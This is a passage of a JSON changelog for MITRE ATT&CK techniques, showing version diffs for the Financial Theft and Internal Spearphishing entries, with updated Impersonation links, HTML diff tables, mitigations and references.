                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-17 16:12:12.496000+00:00\", \"old_value\": \"2025-04-15 22:36:03.465000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \\\"pig butchering,\\\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) \\n\\nAdversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1684/001) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)\\n\\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening to leak sensitive data to the public unless payment is made to the adversary.(Citation: Mandiant-leaks) Adversaries may use dedicated leak sites to distribute victim data.(Citation: Crowdstrike-leaks)\\n\\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)\", \"old_value\": \"Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \\\"pig butchering,\\\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) \\n\\nAdversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)\\n\\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening to leak sensitive data to the public unless payment is made to the adversary.(Citation: Mandiant-leaks) Adversaries may use dedicated leak sites to distribute victim data.(Citation: Crowdstrike-leaks)\\n\\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)\", \"diff\": \"--- \\n+++ \\n@@ -1,6 +1,6 @@\\n Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \\\"pig butchering,\\\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) \\n \\n-Adversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)\\n+Adversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1684/001) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)\\n \\n Extortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening to leak sensitive data to the public unless payment is made to the adversary.(Citation: Mandiant-leaks) Adversaries may use dedicated leak sites to distribute victim data.(Citation: Crowdstrike-leaks)\\n \"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
                    "previous_version": "1.2",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to15__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to15__0\"><a href=\"#difflib_chg_to15__top\">t</a></td><td class=\"diff_header\" id=\"from15_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;steal&nbsp;monetary&nbsp;resources&nbsp;from&nbsp;targets&nbsp;throug</td><td class=\"diff_next\"><a href=\"#difflib_chg_to15__top\">t</a></td><td class=\"diff_header\" id=\"to15_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;steal&nbsp;monetary&nbsp;resources&nbsp;from&nbsp;targets&nbsp;throug</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">h&nbsp;extortion,&nbsp;social&nbsp;engineering,&nbsp;technical&nbsp;theft,&nbsp;or&nbsp;other&nbsp;m</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">h&nbsp;extortion,&nbsp;social&nbsp;engineering,&nbsp;technical&nbsp;theft,&nbsp;or&nbsp;other&nbsp;m</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ethods&nbsp;aimed&nbsp;at&nbsp;their&nbsp;own&nbsp;financial&nbsp;gain&nbsp;at&nbsp;the&nbsp;expense&nbsp;of&nbsp;t</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ethods&nbsp;aimed&nbsp;at&nbsp;their&nbsp;own&nbsp;financial&nbsp;gain&nbsp;at&nbsp;the&nbsp;expense&nbsp;of&nbsp;t</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">he&nbsp;availability&nbsp;of&nbsp;these&nbsp;resources&nbsp;for&nbsp;victims.&nbsp;Financial&nbsp;th</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">he&nbsp;availability&nbsp;of&nbsp;these&nbsp;resources&nbsp;for&nbsp;victims.&nbsp;Financial&nbsp;th</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">eft&nbsp;is&nbsp;the&nbsp;ultimate&nbsp;objective&nbsp;of&nbsp;several&nbsp;popular&nbsp;campaign&nbsp;ty</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">eft&nbsp;is&nbsp;the&nbsp;ultimate&nbsp;objective&nbsp;of&nbsp;several&nbsp;popular&nbsp;campaign&nbsp;ty</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">pes&nbsp;including&nbsp;extortion&nbsp;by&nbsp;ransomware,(Citation:&nbsp;FBI-ransomw</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">pes&nbsp;including&nbsp;extortion&nbsp;by&nbsp;ransomware,(Citation:&nbsp;FBI-ransomw</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">are)&nbsp;business&nbsp;email&nbsp;compromise&nbsp;(BEC)&nbsp;and&nbsp;fraud,(Citation:&nbsp;FB</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">are)&nbsp;business&nbsp;email&nbsp;compromise&nbsp;(BEC)&nbsp;and&nbsp;fraud,(Citation:&nbsp;FB</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">I-BEC)&nbsp;\"pig&nbsp;butchering,\"(Citation:&nbsp;wired-pig&nbsp;butchering)&nbsp;ban</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">I-BEC)&nbsp;\"pig&nbsp;butchering,\"(Citation:&nbsp;wired-pig&nbsp;butchering)&nbsp;ban</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">k&nbsp;hacking,(Citation:&nbsp;DOJ-DPRK&nbsp;Heist)&nbsp;and&nbsp;exploiting&nbsp;cryptocu</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">k&nbsp;hacking,(Citation:&nbsp;DOJ-DPRK&nbsp;Heist)&nbsp;and&nbsp;exploiting&nbsp;cryptocu</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rrency&nbsp;networks.(Citation:&nbsp;BBC-Ronin)&nbsp;&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;[Com</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">rrency&nbsp;networks.(Citation:&nbsp;BBC-Ronin)&nbsp;&nbsp;&nbsp;Adversaries&nbsp;may&nbsp;[Com</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">promise&nbsp;Accounts](https://attack.mitre.org/techniques/T1586)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">promise&nbsp;Accounts](https://attack.mitre.org/techniques/T1586)</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;to&nbsp;conduct&nbsp;unauthorized&nbsp;transfers&nbsp;of&nbsp;funds.(Citation:&nbsp;Inter</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;to&nbsp;conduct&nbsp;unauthorized&nbsp;transfers&nbsp;of&nbsp;funds.(Citation:&nbsp;Inter</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">net&nbsp;crime&nbsp;report&nbsp;2022)&nbsp;In&nbsp;the&nbsp;case&nbsp;of&nbsp;business&nbsp;email&nbsp;comprom</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">net&nbsp;crime&nbsp;report&nbsp;2022)&nbsp;In&nbsp;the&nbsp;case&nbsp;of&nbsp;business&nbsp;email&nbsp;comprom</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ise&nbsp;or&nbsp;email&nbsp;fraud,&nbsp;an&nbsp;adversary&nbsp;may&nbsp;utilize&nbsp;[Impersonation]</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ise&nbsp;or&nbsp;email&nbsp;fraud,&nbsp;an&nbsp;adversary&nbsp;may&nbsp;utilize&nbsp;[Impersonation]</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">(https://attack.mitre.org/techniques/T16<span class=\"diff_chg\">56</span>)&nbsp;of&nbsp;a&nbsp;trusted&nbsp;ent</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">(https://attack.mitre.org/techniques/T16<span class=\"diff_chg\">84/001</span>)&nbsp;of&nbsp;a&nbsp;trusted</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ity.&nbsp;Once&nbsp;the&nbsp;social&nbsp;engineering&nbsp;is&nbsp;successful,&nbsp;victims&nbsp;can&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;entity.&nbsp;Once&nbsp;the&nbsp;social&nbsp;engineering&nbsp;is&nbsp;successful,&nbsp;victims&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">be&nbsp;deceived&nbsp;into&nbsp;sending&nbsp;money&nbsp;to&nbsp;financial&nbsp;accounts&nbsp;control</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">can&nbsp;be&nbsp;deceived&nbsp;into&nbsp;sending&nbsp;money&nbsp;to&nbsp;financial&nbsp;accounts&nbsp;con</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">led&nbsp;by&nbsp;an&nbsp;adversary.(Citation:&nbsp;FBI-BEC)&nbsp;This&nbsp;creates&nbsp;the&nbsp;pot</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">trolled&nbsp;by&nbsp;an&nbsp;adversary.(Citation:&nbsp;FBI-BEC)&nbsp;This&nbsp;creates&nbsp;the</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ential&nbsp;for&nbsp;multiple&nbsp;victims&nbsp;(i.e.,&nbsp;compromised&nbsp;accounts&nbsp;as&nbsp;w</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;potential&nbsp;for&nbsp;multiple&nbsp;victims&nbsp;(i.e.,&nbsp;compromised&nbsp;accounts&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ell&nbsp;as&nbsp;the&nbsp;ultimate&nbsp;monetary&nbsp;loss)&nbsp;in&nbsp;incidents&nbsp;involving&nbsp;fi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">as&nbsp;well&nbsp;as&nbsp;the&nbsp;ultimate&nbsp;monetary&nbsp;loss)&nbsp;in&nbsp;incidents&nbsp;involvin</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nancial&nbsp;theft.(Citation:&nbsp;VEC)&nbsp;&nbsp;Extortion&nbsp;by&nbsp;ransomware&nbsp;may&nbsp;o</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">g&nbsp;financial&nbsp;theft.(Citation:&nbsp;VEC)&nbsp;&nbsp;Extortion&nbsp;by&nbsp;ransomware&nbsp;m</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ccur,&nbsp;for&nbsp;example,&nbsp;when&nbsp;an&nbsp;adversary&nbsp;demands&nbsp;payment&nbsp;from&nbsp;a&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ay&nbsp;occur,&nbsp;for&nbsp;example,&nbsp;when&nbsp;an&nbsp;adversary&nbsp;demands&nbsp;payment&nbsp;fro</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">victim&nbsp;after&nbsp;[Data&nbsp;Encrypted&nbsp;for&nbsp;Impact](https://attack.mitr</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">m&nbsp;a&nbsp;victim&nbsp;after&nbsp;[Data&nbsp;Encrypted&nbsp;for&nbsp;Impact](https://attack.</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">e.org/techniques/T1486)&nbsp;(Citation:&nbsp;NYT-Colonial)&nbsp;and&nbsp;[Exfilt</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">mitre.org/techniques/T1486)&nbsp;(Citation:&nbsp;NYT-Colonial)&nbsp;and&nbsp;[Ex</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ration](https://attack.mitre.org/tactics/TA0010)&nbsp;of&nbsp;data,&nbsp;fo</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">filtration](https://attack.mitre.org/tactics/TA0010)&nbsp;of&nbsp;data</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">llowed&nbsp;by&nbsp;threatening&nbsp;to&nbsp;leak&nbsp;sensitive&nbsp;data&nbsp;to&nbsp;the&nbsp;public&nbsp;u</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">,&nbsp;followed&nbsp;by&nbsp;threatening&nbsp;to&nbsp;leak&nbsp;sensitive&nbsp;data&nbsp;to&nbsp;the&nbsp;publ</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nless&nbsp;payment&nbsp;is&nbsp;made&nbsp;to&nbsp;the&nbsp;adversary.(Citation:&nbsp;Mandiant-l</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ic&nbsp;unless&nbsp;payment&nbsp;is&nbsp;made&nbsp;to&nbsp;the&nbsp;adversary.(Citation:&nbsp;Mandia</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">eaks)&nbsp;Adversaries&nbsp;may&nbsp;use&nbsp;dedicated&nbsp;leak&nbsp;sites&nbsp;to&nbsp;distribute</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">nt-leaks)&nbsp;Adversaries&nbsp;may&nbsp;use&nbsp;dedicated&nbsp;leak&nbsp;sites&nbsp;to&nbsp;distri</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;victim&nbsp;data.(Citation:&nbsp;Crowdstrike-leaks)&nbsp;&nbsp;Due&nbsp;to&nbsp;the&nbsp;poten</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">bute&nbsp;victim&nbsp;data.(Citation:&nbsp;Crowdstrike-leaks)&nbsp;&nbsp;Due&nbsp;to&nbsp;the&nbsp;p</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tially&nbsp;immense&nbsp;business&nbsp;impact&nbsp;of&nbsp;financial&nbsp;theft,&nbsp;an&nbsp;advers</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">otentially&nbsp;immense&nbsp;business&nbsp;impact&nbsp;of&nbsp;financial&nbsp;theft,&nbsp;an&nbsp;ad</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ary&nbsp;may&nbsp;abuse&nbsp;the&nbsp;possibility&nbsp;of&nbsp;financial&nbsp;theft&nbsp;and&nbsp;seeking</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">versary&nbsp;may&nbsp;abuse&nbsp;the&nbsp;possibility&nbsp;of&nbsp;financial&nbsp;theft&nbsp;and&nbsp;see</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;monetary&nbsp;gain&nbsp;to&nbsp;divert&nbsp;attention&nbsp;from&nbsp;their&nbsp;true&nbsp;goals&nbsp;suc</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">king&nbsp;monetary&nbsp;gain&nbsp;to&nbsp;divert&nbsp;attention&nbsp;from&nbsp;their&nbsp;true&nbsp;goals</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">h&nbsp;as&nbsp;[Data&nbsp;Destruction](https://attack.mitre.org/techniques/</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;such&nbsp;as&nbsp;[Data&nbsp;Destruction](https://attack.mitre.org/techniq</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">T1485)&nbsp;and&nbsp;business&nbsp;disruption.(Citation:&nbsp;AP-NotPetya)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ues/T1485)&nbsp;and&nbsp;business&nbsp;disruption.(Citation:&nbsp;AP-NotPetya)</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1017: User Training",
                            "M1018: User Account Management"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0495: Detection Strategy for Financial Theft"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--9e7452df-5144-4b6e-b04a-b66dd4016747",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2019-09-04 19:26:12.441000+00:00",
                    "modified": "2026-04-17 14:23:56.376000+00:00",
                    "name": "Internal Spearphishing",
                    "description": "After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1684/001).(Citation: Trend Micro - Int SP)\n\nFor example, adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic login interfaces.\n\nAdversaries may also leverage internal chat apps, such as Microsoft Teams, to spread malicious content or engage users in attempts to capture sensitive information and/or credentials.(Citation: Int SP - chat apps)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "lateral-movement"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1534",
                            "external_id": "T1534"
                        },
                        {
                            "source_name": "Int SP - chat apps",
                            "description": "Microsoft Threat Intelligence. (2023, August 2). Midnight Blizzard conducts targeted social engineering over Microsoft Teams. Retrieved February 16, 2024.",
                            "url": "https://www.microsoft.com/en-us/security/blog/2023/08/02/midnight-blizzard-conducts-targeted-social-engineering-over-microsoft-teams/"
                        },
                        {
                            "source_name": "Trend Micro - Int SP",
                            "description": "Trend Micro. (n.d.). Retrieved February 16, 2024.",
                            "url": "https://www.trendmicro.com/en_us/research.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Tim MalcomVetter",
                        "Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS",
                        "Office Suite",
                        "SaaS",
                        "Windows"
                    ],
                    "x_mitre_version": "1.4",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-17 14:23:56.376000+00:00\", \"old_value\": \"2025-10-24 17:49:09.394000+00:00\"}, \"root['description']\": {\"new_value\": \"After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1684/001).(Citation: Trend Micro - Int SP)\\n\\nFor example, adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic login interfaces.\\n\\nAdversaries may also leverage internal chat apps, such as Microsoft Teams, to spread malicious content or engage users in attempts to capture sensitive information and/or credentials.(Citation: Int SP - chat apps)\", \"old_value\": \"After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)\\n\\nFor example, adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic login interfaces.\\n\\nAdversaries may also leverage internal chat apps, such as Microsoft Teams, to spread malicious content or engage users in attempts to capture sensitive information and/or credentials.(Citation: Int SP - chat apps)\", \"diff\": \"--- \\n+++ \\n@@ -1,4 +1,4 @@\\n-After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)\\n+After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1684/001).(Citation: Trend Micro - Int SP)\\n \\n For example, adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic login interfaces.\\n \"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}, \"iterable_item_removed\": {\"root['external_references'][1]\": {\"source_name\": \"Trend Micro When Phishing Starts from the Inside 2017\", \"description\": \"Chris Taylor. (2017, October 5). When Phishing Starts from the Inside. Retrieved October 8, 2019.\", \"url\": \"https://blog.trendmicro.com/phishing-starts-inside/\"}}}",
                    "previous_version": "1.4",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to39__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to39__0\"><a href=\"#difflib_chg_to39__top\">t</a></td><td class=\"diff_header\" id=\"from39_1\">1</td><td nowrap=\"nowrap\">After&nbsp;they&nbsp;already&nbsp;have&nbsp;access&nbsp;to&nbsp;accounts&nbsp;or&nbsp;systems&nbsp;within</td><td class=\"diff_next\"><a href=\"#difflib_chg_to39__top\">t</a></td><td class=\"diff_header\" id=\"to39_1\">1</td><td nowrap=\"nowrap\">After&nbsp;they&nbsp;already&nbsp;have&nbsp;access&nbsp;to&nbsp;accounts&nbsp;or&nbsp;systems&nbsp;within</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td 